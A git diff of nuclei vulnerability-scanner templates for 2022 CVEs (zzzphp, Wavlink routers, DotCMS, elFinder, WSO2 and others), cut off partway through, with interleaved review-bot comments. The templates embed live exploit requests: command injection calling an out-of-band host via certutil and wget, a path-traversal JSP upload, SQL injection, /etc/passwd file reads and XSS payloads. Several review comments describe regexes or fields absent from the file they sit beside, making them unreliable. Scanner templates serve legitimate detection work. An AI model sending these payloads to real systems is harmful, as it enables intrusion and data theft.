diff --git a/nuclei-templates/CVE-2022/cve-2022-23881.yaml b/nuclei-templates/CVE-2022/cve-2022-23881.yaml
deleted file mode 100644
index 73150a422c..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-23881.yaml
+++ /dev/null
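Review bot: The location regex `'https?:\/\/(.*):'`, used by both the matcher and the extractor, only matches when a colon follows the host, so a Location header that redirects to an internal hostname without an explicit port produces no finding and no extracted value. A host-bounded group such as `'https?:\/\/([^/:]+)'` captures the hostname with or without a port and stops the greedy `.*` from swallowing the path when the URL contains a later colon. The description names the fixed build 10.1.2137.8 but the template has no version check, so a comment such as `# behavioural check only: fires on any redirect to a host that differs from {{Host}}, no version gating` would tell a triager how much weight the result carries.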
@@ -1,37 +0,0 @@ -id: CVE-2022-23881 - -info: - name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution - author: pikpikcu - severity: critical - description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. - reference: - - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - - http://www.zzzcms.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23881 - cwe-id: CWE-77 - tags: cve,cve2022,rce,zzzphp,zzzcms - -requests: - - raw: - - | - GET /?location=search HTTP/1.1 - Host: {{Hostname}} - Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 500 - -# Enhanced by mp on 2022/04/19 diff --git a/nuclei-templates/CVE-2022/cve-2022-24681.yaml b/nuclei-templates/CVE-2022/cve-2022-24681.yaml new file mode 100644 index 0000000000..cb02386823 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24681.yaml 
@@ -0,0 +1,51 @@
+id: CVE-2022-24681
+
+info:
+ name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting
+ author: Open-Sec
+ severity: medium
+ description: |
+ ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.
+ reference:
+ - https://raxis.com/blog/cve-2022-24681
+ - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html
+ - https://manageengine.com
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24681
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-24681
+ cwe-id: CWE-79
+ tags: cve,cve2022,manageengine,xss,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /servlet/GetProductVersion HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: regex
+ part: body
+ name: buildnumber
+ group: 1
+ regex:
+ - '"BUILD_NUMBER":"([0-9]+)",'
+ internal: true
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - compare_versions(buildnumber, '< 6121')
+
+ - type: word
+ part: body
+ words:
+ - "ManageEngine"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/09/14
diff --git a/nuclei-templates/CVE-2022/cve-2022-24856.yaml b/nuclei-templates/CVE-2022/cve-2022-24856.yaml
deleted file mode 100644
index 0dd01066ff..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-24856.yaml
+++ /dev/null
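Review bot: The `authenticated` tag does not match the request, which is a single POST to `/servlet/GetProductVersion` with no credentials or session, and the template never touches the welcome-name attribute; it is a version-inference check, not an XSS probe. Either drop `authenticated` from the tags or make the intent explicit with a comment in `info`, e.g. `# version-based detection: flags BUILD_NUMBER below 6121, does not confirm the stored XSS`, so consumers weight the result accordingly. The `metadata` block that the sibling templates in this commit carry (query hints, `verified`) is also missing here.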
@@ -1,33 +0,0 @@ -id: CVE-2022-24856 - -info: - name: Flyte Console <0.52.0 - Server-Side Request Forgery - author: pdteam - severity: high - description: | - FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. - reference: - - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9 - - https://github.com/flyteorg/flyteconsole/pull/389 - - https://hackerone.com/reports/1540906 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24856 - remediation: | - The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-24856 - cwe-id: CWE-918 - tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone - -requests: - - method: GET - path: - - "{{BaseURL}}/cors_proxy/https://www.interact.sh" - - matchers: - - type: word - words: - - "Interactsh Server" - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-2486.yaml b/nuclei-templates/CVE-2022/cve-2022-2486.yaml new file mode 100644 index 0000000000..bf397b6486 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-2486.yaml 
@@ -0,0 +1,41 @@
+id: CVE-2022-2486
+
+info:
+ name: Wavlink WN535K2/WN535K3 - OS Command Injection
+ author: For3stCo1d
+ severity: critical
+ description: |
+ Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+ reference:
+ - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486
+ - https://vuldb.com/?id.204537
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-2486
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-2486
+ cwe-id: CWE-78
+ metadata:
+ shodan-query: http.title:"Wi-Fi APP Login"
+ verified: "true"
+ tags: cve,cve2022,iot,wavlink,router,rce,oast
+
+requests:
+ - raw:
+ - |
+ GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+ - type: status
+ status:
+ - 500
+
+# Enhanced by md on 2022/10/06
diff --git a/nuclei-templates/CVE-2022/cve-2022-2487.yaml b/nuclei-templates/CVE-2022/cve-2022-2487.yaml
new file mode 100644
index 0000000000..e4ba8d4c26
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-2487.yaml
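Review bot: The `status: 500` matcher is ANDed with the `interactsh_protocol` hit, so a confirmed out-of-band callback is discarded whenever the CGI answers with any other status code; the same AND-with-500 pattern appears in cve-2022-30525.yaml later in this commit. For OAST-based confirmation the interaction itself is the evidence, so the status matcher should be removed rather than gate the result, or a comment should state that a 500 is the only response ever observed on affected firmware. Unlike the sibling cve-2022-2487.yaml the raw request carries no `@timeout`, and `verified: "true"` is a quoted string where other templates in the repository use the bare boolean.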
@@ -0,0 +1,55 @@
+id: CVE-2022-2487
+
+info:
+ name: Wavlink WN535K2/WN535K3 - OS Command Injection
+ author: For3stCo1d
+ severity: critical
+ description: |
+ Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+ reference:
+ - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487
+ - https://vuldb.com/?id.204538
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-2487
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-2487
+ cwe-id: CWE-78
+ metadata:
+ shodan-query: http.title:"Wi-Fi APP Login"
+ verified: "true"
+ tags: cve,cve2022,iot,wavlink,router,rce,oast
+
+variables:
+ cmd: "id"
+
+requests:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /cgi-bin/nightled.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ page=night_led&start_hour=;{{cmd}};
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "uid="
+ - "gid="
+ - "nightStart"
+ condition: and
+
+ - type: word
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by md on 2022/10/06
diff --git a/nuclei-templates/CVE-2022/cve-2022-2488.yaml b/nuclei-templates/CVE-2022/cve-2022-2488.yaml
deleted file mode 100644
index f4e04da2f6..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-2488.yaml
+++ /dev/null
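Review bot: The body matcher is hard-coupled to the output of the `cmd` variable — `uid=` and `gid=` are only produced by `id` — yet `cmd` is a template variable that can be overridden at scan time, in which case the template silently reports nothing. Annotate the coupling, `cmd: "id" # body matcher below expects id(1) output (uid=/gid=); keep both in sync`, or inline the value so there is nothing to override. The `text/html` word matcher has no `part:` and so runs against nuclei's default part rather than the response header, which is presumably where the content type lives; the sibling templates in this commit use `part: header` for the same check.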
@@ -1,41 +0,0 @@ -id: CVE-2022-2488 - -info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection - author: For3stCo1d - severity: critical - description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 - - https://vuldb.com/?id.204539 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2488 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2488 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast - -requests: - - raw: - - | - GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 500 - -# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml b/nuclei-templates/CVE-2022/cve-2022-25323.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-25323.yaml rename to nuclei-templates/CVE-2022/cve-2022-25323.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml b/nuclei-templates/CVE-2022/cve-2022-26148.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-26148.yaml rename to nuclei-templates/CVE-2022/cve-2022-26148.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-26159.yaml b/nuclei-templates/CVE-2022/cve-2022-26159.yaml deleted file mode 100644 index 41d6be2d94..0000000000 
--- a/nuclei-templates/CVE-2022/cve-2022-26159.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-26159 - -info: - name: Ametys CMS Information Disclosure - author: Remi Gascou (podalirius) - severity: medium - description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - - https://podalirius.net/en/cves/2022-26159/ - - https://issues.ametys.org/browse/CMS-10973 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-26159 - tags: cve,cve2022,plugin,ametys,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' - - matchers-condition: and - matchers: - - type: word - words: - - '<auto-completion>' - - '<item>' - condition: and - - - type: word - part: header - words: - - 'text/xml' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/cve-2022-26352.yaml b/nuclei-templates/CVE-2022/cve-2022-26352.yaml new file mode 100644 index 0000000000..159d6dd4a0 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26352.yaml 
@@ -0,0 +1,48 @@
+id: CVE-2022-26352
+
+info:
+ name: DotCMS - Arbitrary File Upload
+ author: h1ei1
+ severity: critical
+ description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.
+ reference:
+ - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
+ - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352
+ - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-26352
+ cwe-id: CWE-22,CWE-434
+ tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive
+
+requests:
+ - raw:
+ - |
+ POST /api/content/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3
+
+ --------------------------aadc326f7ae3eac3
+ Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp"
+ Content-Type: text/plain
+
+ <%
+ out.println("CVE-2022-26352");
+ %>
+ --------------------------aadc326f7ae3eac3--
+
+ - |
+ GET /{{randstr}}.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2, "CVE-2022-26352")'
+ - 'status_code_2 == 200'
+ condition: and
+
+# Enhanced by mp on 2022/05/19
diff --git a/nuclei-templates/CVE-2022/cve-2022-26564.yaml b/nuclei-templates/CVE-2022/cve-2022-26564.yaml
new file mode 100644
index 0000000000..33e215310b
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-26564.yaml
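Review bot: The template writes `{{randstr}}.jsp` into the Tomcat webroot and never removes it, so every positive run leaves a server-side artifact behind; the `intrusive` tag hints at this, but the `info` block should say so and tell operators what to clean up, e.g. `# leaves /{{randstr}}.jsp under webapps/ROOT on success; remove it after the scan`. Detection is also tied to the hard-coded deployment path `/srv/dotserver/tomcat-9.0.41/webapps/ROOT/`, so a negative result does not clear an install with a different Tomcat version or prefix — worth a comment so the scan output is not read as a clean bill of health. The fixed version is not stated anywhere in `info`, whereas the sibling templates in this commit put it in `name`.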
@@ -0,0 +1,48 @@
+id: CVE-2022-26564
+
+info:
+ name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting
+ author: alexrydzak
+ severity: medium
+ description: |
+ HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.
+ reference:
+ - https://rydzak.me/2022/04/cve-2022-26564/
+ - https://www.hoteldruid.com
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-26564
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-26564
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: http.favicon.hash:-1521640213
+ tags: cve,cve2022,hoteldruid,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>'
+ - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1'
+ - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "<script>javascript:alert('XSS')</script>"
+ - "HotelDruid"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/09/09
diff --git a/nuclei-templates/CVE-2022/cve-2022-26960.yaml b/nuclei-templates/CVE-2022/cve-2022-26960.yaml
deleted file mode 100644
index d244810944..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-26960.yaml
+++ /dev/null
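Review bot: The `description` names only the `prezzoperiodo4` parameter in creaprezzi.php, but the path list also probes `modifica_cliente.php?tipo_tabella=` and `dati/availability_tpl.php?num_app_tipo_richiesti1=`, and with `stop-at-first-match: true` a finding may come from any of the three; list all three parameters in the description (or cite where the extra two come from) so a triager knows which endpoint fired. The body match on the literal reflected marker plus `HotelDruid` is a reasonable reflection check, but `metadata` carries no `verified` entry where the sibling templates in this commit do.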
@@ -1,40 +0,0 @@ -id: CVE-2022-26960 - -info: - name: elFinder <=2.1.60 - Local File Inclusion - author: pikpikcu - severity: critical - description: | - elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. - reference: - - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db - - https://www.synacktiv.com/publications.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 - cve-id: CVE-2022-26960 - cwe-id: CWE-22 - metadata: - verified: true - tags: cve,cve2022,lfi,elfinder - -requests: - - raw: - - | - GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/CVE-2022/CVE-2022-27849.yaml b/nuclei-templates/CVE-2022/cve-2022-27849.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-27849.yaml rename to nuclei-templates/CVE-2022/cve-2022-27849.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-28079.yaml b/nuclei-templates/CVE-2022/cve-2022-28079.yaml new file mode 100644 index 0000000000..c1b122ba24 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28079.yaml 
@@ -0,0 +1,45 @@
+id: CVE-2022-28079
+
+info:
+ name: College Management System 1.0 - SQL Injection
+ author: ritikchaddha
+ severity: high
+ description: |
+ College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
+ reference:
+ - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated
+ - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-28079
+ - https://code-projects.org/college-management-system-in-php-with-source-code/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2022-28079
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cms,collegemanagement
+
+variables:
+ num: "999999999"
+
+requests:
+ - raw:
+ - |
+ POST /admin/asign-single-student-subjects.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '{{md5({{num}})}}'
+
+ - type: status
+ status:
+ - 302
+
+# Enhanced by mp on 2022/07/15
diff --git a/nuclei-templates/CVE-2022/cve-2022-28080.yaml b/nuclei-templates/CVE-2022/cve-2022-28080.yaml
deleted file mode 100644
index 021d8a2b18..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-28080.yaml
+++ /dev/null
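Review bot: The referenced advisory is titled "...SQL-Injection-Authenticated" and the request targets `/admin/asign-single-student-subjects.php`, yet the template sends no login step and carries no `authenticated` tag, unlike cve-2022-24681.yaml in the same commit and the CVSS vector's `PR:L`. If the endpoint requires an admin session the template can never fire; if it answers without one, say so next to the request, e.g. `# endpoint responds without a session despite the advisory title — verified on <version placeholder>`. Matching a body word together with `status: 302` is also unusual for a redirect response, so a `part: body` on the word matcher and a short comment on why the hash is expected in a redirect body would make the intent explicit.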
@@ -1,72 +0,0 @@ -id: CVE-2022-28080 - -info: - name: Royal Event - SQL Injection - author: lucasljm2001,ekrause,ritikchaddha - severity: high - description: | - Royal Event is vulnerable to a SQL injection vulnerability. - reference: - - https://www.exploit-db.com/exploits/50934 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28080 - tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms - -requests: - - raw: - - | - POST /royal_event/ HTTP/1.1 - Host: {{Hostname}} - Content-Length: 353 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="username" - - {{username}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="password" - - {{password}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="login" - - - ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - - | - POST /royal_event/btndates_report.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="todate" - - 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="search" - - 3 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="fromdate" - - 01/01/2011 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - 
'{{md5("{{randstr}}")}}' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-29298.yaml b/nuclei-templates/CVE-2022/cve-2022-29298.yaml deleted file mode 100644 index 2f75e09114..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29298.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-29298 - -info: - name: SolarView Compact 6.00 - Local File Inclusion - author: ritikchaddha - severity: high - description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. - reference: - - https://www.exploit-db.com/exploits/50950 - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing - - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-29298 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: lfi,solarview,edb,cve,cve2022 - -requests: - - method: GET - path: - - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-29548.yaml b/nuclei-templates/CVE-2022/cve-2022-29548.yaml deleted file mode 100644 index 5b26802bf7..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29548.yaml +++ /dev/null 
@@ -1,44 +0,0 @@ -id: CVE-2022-29548 - -info: - name: WSO2 - Cross-Site Scripting - author: edoardottt - severity: medium - description: | - WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-29548 - cwe-id: CWE-79 - metadata: - google-query: inurl:"carbon/admin/login" - verified: "true" - tags: cve,cve2022,wso2,xss,packetstorm - -requests: - - method: GET - path: - - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "CARBON.showWarningDialog('???');alert(document.domain)//???" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-30489.yaml b/nuclei-templates/CVE-2022/cve-2022-30489.yaml deleted file mode 100644 index 03406d9de4..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30489.yaml +++ /dev/null 
@@ -1,49 +0,0 @@ -id: CVE-2022-30489 - -info: - name: Wavlink WN-535G3 - Cross-Site Scripting - author: For3stCo1d - severity: medium - description: | - Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. - reference: - - https://github.com/badboycxcc/XSS-CVE-2022-30489 - - https://github.com/badboycxcc/XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30489 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: xss,cve2022,wavlink,cve,router,iot - -requests: - - raw: - - | - POST /cgi-bin/login.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn - - matchers-condition: and - matchers: - - type: word - words: - - '<script>alert(document.domain);</script>' - - 'parent.location.replace("http://")' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-30525.yaml b/nuclei-templates/CVE-2022/cve-2022-30525.yaml new file mode 100644 index 0000000000..12922c9a7a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-30525.yaml 
@@ -0,0 +1,43 @@
+id: CVE-2022-30525
+
+info:
+ name: Zyxel Firewall - OS Command Injection
+ author: h1ei1,prajiteshsingh
+ severity: critical
+ description: |
